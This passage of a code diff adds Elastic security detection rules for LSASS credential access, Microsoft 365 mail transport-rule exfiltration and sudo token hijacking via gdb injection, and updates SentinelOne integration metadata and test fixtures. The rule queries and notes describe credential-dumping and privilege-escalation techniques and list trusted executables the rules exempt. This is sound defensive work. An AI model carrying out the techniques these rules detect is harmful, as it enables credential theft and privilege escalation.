Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of `process.executable`, `process.code_signature.subject_name` and `process.Ext.api.parameters.desired_access_numeric` conditions.\n\n### Related Rules\n\n- Suspicious Lsass Process Access - 128468bf-cab1-4637-99ea-fdf3780a4609\n- Potential Credential Access via DuplicateHandle in LSASS - 02a4576a-7480-4284-9327-548a806b5e48\n- LSASS Memory Dump Handle Access - 208dbe77-01ed-4954-8d44-1e5751cb20de\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - If malicious activity is confirmed, perform a broader investigation to identify the scope of the compromise and determine the appropriate remediation steps.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "api where host.os.type == \"windows\" and \n process.Ext.api.name in (\"OpenProcess\", \"OpenThread\") and Target.process.name : \"lsass.exe\" and \n not \n (\n process.executable : (\n \"?:\\\\ProgramData\\\\GetSupportService*\\\\Updates\\\\Update_*.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"?:\\\\Program Files (x86)\\\\Asiainfo Security\\\\OfficeScan Client\\\\NTRTScan.exe\",\n \"?:\\\\Program Files (x86)\\\\Blackpoint\\\\SnapAgent\\\\SnapAgent.exe\",\n \"?:\\\\Program Files (x86)\\\\eScan\\\\reload.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\n \"?:\\\\Program Files (x86)\\\\Kaspersky Lab\\\\*\\\\avp.exe\",\n \"?:\\\\Program Files (x86)\\\\N-able Technologies\\\\Reactive\\\\bin\\\\NableReactiveManagement.exe\",\n \"?:\\\\Program Files (x86)\\\\N-able Technologies\\\\Windows Agent\\\\bin\\\\agent.exe\",\n \"?:\\\\Program Files (x86)\\\\Trend Micro\\\\*\\\\CCSF\\\\TmCCSF.exe\",\n \"?:\\\\Program Files*\\\\Windows Defender\\\\MsMpEng.exe\",\n \"?:\\\\Program Files\\\\Bitdefender\\\\Endpoint Security\\\\EPSecurityService.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files\\\\Common Files\\\\McAfee\\\\AVSolution\\\\mcshield.exe\",\n \"?:\\\\Program Files\\\\EA\\\\AC\\\\EAAntiCheat.GameService.exe\",\n \"?:\\\\Program Files\\\\Elastic\\\\Agent\\\\data\\\\elastic-agent-*\\\\components\\\\metricbeat.exe\",\n \"?:\\\\Program Files\\\\Elastic\\\\Agent\\\\data\\\\elastic-agent-*\\\\components\\\\osqueryd.exe\",\n \"?:\\\\Program Files\\\\Elastic\\\\Agent\\\\data\\\\elastic-agent-*\\\\components\\\\packetbeat.exe\",\n \"?:\\\\Program Files\\\\ESET\\\\ESET Security\\\\ekrn.exe\",\n \"?:\\\\Program Files\\\\Fortinet\\\\FortiClient\\\\FortiProxy.exe\",\n \"?:\\\\Program Files\\\\Huntress\\\\HuntressAgent.exe\",\n \"?:\\\\Program Files\\\\LogicMonitor\\\\Agent\\\\bin\\\\sbshutdown.exe\",\n \"?:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe\",\n \"?:\\\\Program Files\\\\Qualys\\\\QualysAgent\\\\QualysAgent.exe\",\n \"?:\\\\Program Files\\\\TDAgent\\\\ossec-agent\\\\ossec-agent.exe\",\n \"?:\\\\Program Files\\\\Topaz OFD\\\\Warsaw\\\\core.exe\",\n \"?:\\\\Program Files\\\\VMware\\\\VMware Tools\\\\vmtoolsd.exe\",\n \"?:\\\\Windows\\\\AdminArsenal\\\\PDQDeployRunner\\\\*\\\\exec\\\\Sysmon64.exe\",\n \"?:\\\\Windows\\\\Sysmon.exe\",\n \"?:\\\\Windows\\\\Sysmon64.exe\",\n \"?:\\\\Windows\\\\System32\\\\csrss.exe\",\n \"?:\\\\Windows\\\\System32\\\\MRT.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\RtkAudUService64.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\"\n ) and process.code_signature.trusted == true\n )\n", + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Target.process.name", + "type": "unknown" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.api.name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ff4599cb-409f-4910-a239-52e4e6f532ff", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1106", + "name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "ff4599cb-409f-4910-a239-52e4e6f532ff_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_103.json b/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_103.json new file mode 100644 index 00000000000..34730c50592 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_103.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a transport rule creation in Microsoft 365. As a best practice, Exchange Online mail transport rules should not be set to forward email to domains outside of your organization. An adversary may create transport rules to exfiltrate data.", + "false_positives": [ + "A new transport rule may be created by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Transport Rule Creation", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"New-TransportRule\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/new-transportrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ff4dd44a-0ac6-44c4-8609-3f81bc820f02", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Exfiltration" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1537", + "name": "Transfer Data to Cloud Account", + "reference": "https://attack.mitre.org/techniques/T1537/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "ff4dd44a-0ac6-44c4-8609-3f81bc820f02_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_105.json b/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_105.json new file mode 100644 index 00000000000..e0e0287471d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_105.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a transport rule creation in Microsoft 365. As a best practice, Exchange Online mail transport rules should not be set to forward email to domains outside of your organization. An adversary may create transport rules to exfiltrate data.", + "false_positives": [ + "A new transport rule may be created by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Transport Rule Creation", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"New-TransportRule\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/new-transportrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ff4dd44a-0ac6-44c4-8609-3f81bc820f02", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Exfiltration" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1537", + "name": "Transfer Data to Cloud Account", + "reference": "https://attack.mitre.org/techniques/T1537/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "ff4dd44a-0ac6-44c4-8609-3f81bc820f02_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_206.json b/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_206.json new file mode 100644 index 00000000000..539095d948c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_206.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a transport rule creation in Microsoft 365. As a best practice, Exchange Online mail transport rules should not be set to forward email to domains outside of your organization. An adversary may create transport rules to exfiltrate data.", + "false_positives": [ + "A new transport rule may be created by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Transport Rule Creation", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"New-TransportRule\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/new-transportrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ff4dd44a-0ac6-44c4-8609-3f81bc820f02", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Exfiltration" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1537", + "name": "Transfer Data to Cloud Account", + "reference": "https://attack.mitre.org/techniques/T1537/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "ff4dd44a-0ac6-44c4-8609-3f81bc820f02_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_5.json b/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_5.json new file mode 100644 index 00000000000..d99d88e8fc8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_5.json @@ -0,0 +1,118 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects potential sudo token manipulation attacks through process injection by monitoring the use of a debugger (gdb) process followed by a successful uid change event during the execution of the sudo process. A sudo token manipulation attack is performed by injecting into a process that has a valid sudo token, which can then be used by attackers to activate their own sudo token. This attack requires ptrace to be enabled in conjunction with the existence of a living process that has a valid sudo token with the same uid as the current user.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Sudo Token Manipulation via Process Injection", + "query": "sequence by host.id, process.session_leader.entity_id with maxspan=15s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \n process.name == \"gdb\" and process.user.id != \"0\" and process.group.id != \"0\" ]\n[ process where host.os.type == \"linux\" and event.action == \"uid_change\" and event.type == \"change\" and \n process.name == \"sudo\" and process.user.id == \"0\" and process.group.id == \"0\" ]\n", + "references": [ + "https://github.com/nongiach/sudo_inject" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.group.id", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.session_leader.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ff9bc8b9-f03b-4283-be58-ee0a16f5a11b", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/", + "subtechnique": [ + { + "id": "T1055.008", + "name": "Ptrace System Calls", + "reference": "https://attack.mitre.org/techniques/T1055/008/" + } + ] + }, + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.003", + "name": "Sudo and Sudo Caching", + "reference": "https://attack.mitre.org/techniques/T1548/003/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 5 + }, + "id": "ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/manifest.yml b/packages/security_detection_engine/manifest.yml index b5abc0375de..c4269ce27cd 100644 --- a/packages/security_detection_engine/manifest.yml +++ b/packages/security_detection_engine/manifest.yml @@ -4,7 +4,7 @@ conditions: elastic: subscription: basic kibana: - version: ^8.12.0 + version: ^8.13.0 description: Prebuilt detection rules for Elastic Security format_version: 3.0.0 icons: @@ -19,4 +19,4 @@ source: license: Elastic-2.0 title: Prebuilt Security Detection Rules type: integration -version: 8.12.3 +version: 8.13.3 diff --git a/packages/sentinel_one/changelog.yml b/packages/sentinel_one/changelog.yml index 78b06c0d80b..fc15fc4baa4 100644 --- a/packages/sentinel_one/changelog.yml +++ b/packages/sentinel_one/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.20.0" + changes: + - description: Set sensitive values as secret and fix incorrect mappings. + type: enhancement + link: https://github.com/elastic/integrations/pull/9128 - version: "1.19.2" changes: - description: Changed owners diff --git a/packages/sentinel_one/data_stream/threat/fields/fields.yml b/packages/sentinel_one/data_stream/threat/fields/fields.yml index 84669242933..14ca6f28bf1 100644 --- a/packages/sentinel_one/data_stream/threat/fields/fields.yml +++ b/packages/sentinel_one/data_stream/threat/fields/fields.yml @@ -407,10 +407,10 @@ type: long description: Actions counters Total. - name: agent_supports_report - type: keyword + type: boolean description: The Agent generates a full mitigation report. - name: group_not_found - type: keyword + type: boolean description: Agent could not find the threat. - name: last_update type: keyword diff --git a/packages/sentinel_one/docs/README.md b/packages/sentinel_one/docs/README.md index a183227df0f..dd32b91f4ad 100644 --- a/packages/sentinel_one/docs/README.md +++ b/packages/sentinel_one/docs/README.md @@ -1644,8 +1644,8 @@ An example event for `threat` looks as following: | sentinel_one.threat.mitigation_status.action_counters.pending_reboot | Actions counters Pending reboot. | long | | sentinel_one.threat.mitigation_status.action_counters.success | Actions counters Success. | long | | sentinel_one.threat.mitigation_status.action_counters.total | Actions counters Total. | long | -| sentinel_one.threat.mitigation_status.agent_supports_report | The Agent generates a full mitigation report. | keyword | -| sentinel_one.threat.mitigation_status.group_not_found | Agent could not find the threat. | keyword | +| sentinel_one.threat.mitigation_status.agent_supports_report | The Agent generates a full mitigation report. | boolean | +| sentinel_one.threat.mitigation_status.group_not_found | Agent could not find the threat. | boolean | | sentinel_one.threat.mitigation_status.last_update | Timestamp of last mitigation status update. | keyword | | sentinel_one.threat.mitigation_status.latest_report | Report download URL. If None, there is no report. | keyword | | sentinel_one.threat.mitigation_status.mitigation_ended_at | The time the Agent finished the mitigation. | keyword | diff --git a/packages/sentinel_one/manifest.yml b/packages/sentinel_one/manifest.yml index 3d9404f6d9c..a1e49bc5ea2 100644 --- a/packages/sentinel_one/manifest.yml +++ b/packages/sentinel_one/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.2" name: sentinel_one title: SentinelOne -version: "1.19.2" +version: "1.20.0" description: Collect logs from SentinelOne with Elastic Agent. type: integration categories: @@ -9,7 +9,7 @@ categories: - edr_xdr conditions: kibana: - version: ^8.7.1 + version: ^8.12.0 screenshots: - src: /img/sentinel-one-screenshot.png title: SentinelOne Threat Dashboard Screenshot @@ -46,6 +46,7 @@ policy_templates: title: API Token description: API Token with API Access Level type. required: true + secret: true - name: proxy_url type: text title: Proxy URL diff --git a/packages/sentinel_one_cloud_funnel/changelog.yml b/packages/sentinel_one_cloud_funnel/changelog.yml index 12f2ea32253..43bfbfba90c 100644 --- a/packages/sentinel_one_cloud_funnel/changelog.yml +++ b/packages/sentinel_one_cloud_funnel/changelog.yml @@ -1,4 +1,27 @@ # newer versions go on top +- version: "0.14.0" + changes: + - description: Improve `event.type` and `event.action` mappings, fix missing `preserve_original_event` setting for GCS input. + type: enhancement + link: https://github.com/elastic/integrations/pull/9524 +- version: "0.13.0" + changes: + - description: Improve detection rules support for process events. + type: enhancement + link: https://github.com/elastic/integrations/pull/9361 +- version: "0.12.0" + changes: + - description: Improve detection rules support. + type: enhancement + link: https://github.com/elastic/integrations/pull/9120 + - description: Lower kibana version requirement to v8.10.1. + type: enhancement + link: https://github.com/elastic/integrations/pull/9120 +- version: "0.11.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9128 - version: "0.10.1" changes: - description: Changed owners diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-command-script.log-expected.json b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-command-script.log-expected.json index ae7e7cf98fb..b232b9db0b6 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-command-script.log-expected.json +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-command-script.log-expected.json @@ -21,15 +21,32 @@ }, "host": { "hostname": "asdf1", + "id": "asdf356783457dfds4456d65", "os": { "name": "WindowsServer2019Standard", - "platform": "windows" + "platform": "windows", + "type": "windows" }, "type": "server" }, + "powershell": { + "file": { + "script_block_text": "$global:?" + } + }, "process": { + "args": [ + "powershell.exe-ExecutionPolicyRestricted-CommandWrite-Host'Finalresult:1';" + ], + "args_count": 1, + "code_signature": { + "exists": true, + "subject_name": "MICROSOFTWINDOWS", + "trusted": true + }, "command_line": "powershell.exe-ExecutionPolicyRestricted-CommandWrite-Host'Finalresult:1';", "entity_id": "230B188E26085676", + "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "hash": { "md5": "7353f60b1739074eb17c5f4dddefe239", "sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c", @@ -37,8 +54,13 @@ }, "name": "powershell.exe", "parent": { + "args": [ + "C:\\Windows\\system32\\CompatTelRunner.exe-m:appraiser.dll-f:DoScheduledTelemetryRun-cv:1DRRwZous0W15sCL.2" + ], + "args_count": 1, "command_line": "C:\\Windows\\system32\\CompatTelRunner.exe-m:appraiser.dll-f:DoScheduledTelemetryRun-cv:1DRRwZous0W15sCL.2", "entity_id": "8608188E26085676", + "executable": "C:\\Windows\\System32\\CompatTelRunner.exe", "hash": { "sha1": "134fd2ad04cf59b0c10596230da5daf6fc711bd1", "sha256": "046f009960f70981597cd7b3a1e44cbb4ba5893cc1407734366aa55fbeda5d66" @@ -239,7 +261,11 @@ "tags": [ "preserve_original_event", "preserve_duplicate_custom_fields" - ] + ], + "user": { + "domain": "NTAUTHORITY", + "name": "SYSTEM" + } } ] } \ No newline at end of file diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-cross-process.log-expected.json b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-cross-process.log-expected.json index 0b62ef98240..2568ad83d3e 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-cross-process.log-expected.json +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-cross-process.log-expected.json @@ -21,15 +21,27 @@ }, "host": { "hostname": "IHM-MP23Y3DD", + "id": "asdf356783457dfds4456d65", "os": { "name": "Windows10Enterprise", - "platform": "windows" + "platform": "windows", + "type": "windows" }, "type": "laptop" }, "process": { + "args": [ + "C:\\ProgramFiles(x86)\\Microsoft\\important_stuff\\stuff.EXE\\" + ], + "args_count": 1, + "code_signature": { + "exists": true, + "subject_name": "GOOGLELLC", + "trusted": true + }, "command_line": "C:\\ProgramFiles(x86)\\Microsoft\\important_stuff\\stuff.EXE\\", "entity_id": "F27AB6F105F6C47A", + "executable": "C:\\ProgramFiles\\Google\\Chrome\\Application\\chrome.exe", "hash": { "md5": "6693974b22d16712c9a164e154c17556", "sha1": "ebec2705217692afae8e9cc5e82d58d78e7d6d89", @@ -37,8 +49,13 @@ }, "name": "chrome.exe", "parent": { + "args": [ + "C:\\ProgramFiles\\Google\\Chrome\\Application\\chrome.exe--single-argumenthttps://nam04.safelinks.protection.outlook.com/?url=https%3A%2F%2Fwww.asdf.com%2FCopy%2520A%3Fdl%3D0%26subfolder_nav_tracking%3D1&data=05%7C01%7CCeliaVerPloeg%7C122a5275b9e3%7C0%7C0%7C638000749817681064%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C3000%7C%7C%7C&sdata=Oe8GdP%2Fty%2FFwi58b87FF5qp1VjewxNXjXfEBWVf5urI%3D&reserved=0" + ], + "args_count": 1, "command_line": "\"C:\\ProgramFiles\\Google\\Chrome\\Application\\chrome.exe\"--single-argumenthttps://nam04.safelinks.protection.outlook.com/?url=https%3A%2F%2Fwww.asdf.com%2FCopy%2520A%3Fdl%3D0%26subfolder_nav_tracking%3D1&data=05%7C01%7CCeliaVerPloeg%7C122a5275b9e3%7C0%7C0%7C638000749817681064%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C3000%7C%7C%7C&sdata=Oe8GdP%2Fty%2FFwi58b87FF5qp1VjewxNXjXfEBWVf5urI%3D&reserved=0", "entity_id": "F17AB6F105F6C47A", + "executable": "C:\\ProgramFiles\\Google\\Chrome\\Application\\chrome.exe", "hash": { "sha1": "ebec2705217692afae8e9cc5e82d58d78e7d6d89", "sha256": "a462f776c0935c7359e941d9a23b62243e3eabbd1694065fe2e1dc521e685698" @@ -267,7 +284,11 @@ "tags": [ "preserve_original_event", "preserve_duplicate_custom_fields" - ] + ], + "user": { + "domain": "asdf", + "name": "SYSTEM" + } } ] } \ No newline at end of file diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-dns.log-expected.json b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-dns.log-expected.json index 6ea6f6d6a05..4a6d57d8d73 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-dns.log-expected.json +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/_dev/test/pipeline/test-dns.log-expected.json @@ -2,10 +2,18 @@ "expected": [ { "@timestamp": "2022-10-03T15:32:29.495Z", + "dns": { + "question": { + "name": "vrnorfva01.usa.ccu.clearchannel.com" + } + }, "ecs": { "version": "8.11.0" }, "event": { + "action": [ + "lookup_requested" + ], "category": [ "network" ], @@ -13,7 +21,8 @@ "kind": "event", "original": 